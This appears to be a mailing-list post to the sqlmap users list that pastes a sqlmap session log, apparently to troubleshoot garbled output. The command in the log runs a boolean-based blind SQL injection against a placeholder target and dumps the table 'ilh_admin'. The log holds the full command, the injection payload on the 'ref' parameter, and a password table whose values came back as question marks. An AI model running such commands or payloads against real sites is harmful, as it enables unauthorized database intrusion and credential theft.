log:
imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B --threads=10 --no-cast -T ilh_admin --dump
sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 13:22:41
[13:22:41] [INFO] resuming back-end DBMS 'mysql'
[13:22:41] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: ref
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
---
[13:22:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:22:41] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[13:22:41] [INFO] fetching current database
[13:22:41] [INFO] retrieving the length of query output
[13:22:41] [INFO] resumed: 22
[snipped]
[13:22:44] [INFO] retrieving the length of query output
[13:22:44] [INFO] retrieved: 13
[13:22:54] [INFO] retrieved: ?????????????
[13:22:54] [INFO] retrieving the length of query output
[13:22:54] [INFO] retrieved: 1
[13:22:58] [INFO] retrieved: _
[13:23:00] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:23:00] [INFO] retrieving the length of query output
[13:23:00] [INFO] retrieved: 10
[13:23:09] [INFO] retrieved: ??????????
[13:23:09] [INFO] analyzing table dump for possible password hashes
Database: hostl347
Table: ilh_admin
[1 entry]
+----+------------+---------------+
| id | pass       | admin         |
+----+------------+---------------+
|    | ?????????? | ????????????? |
+----+------------+---------------+
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users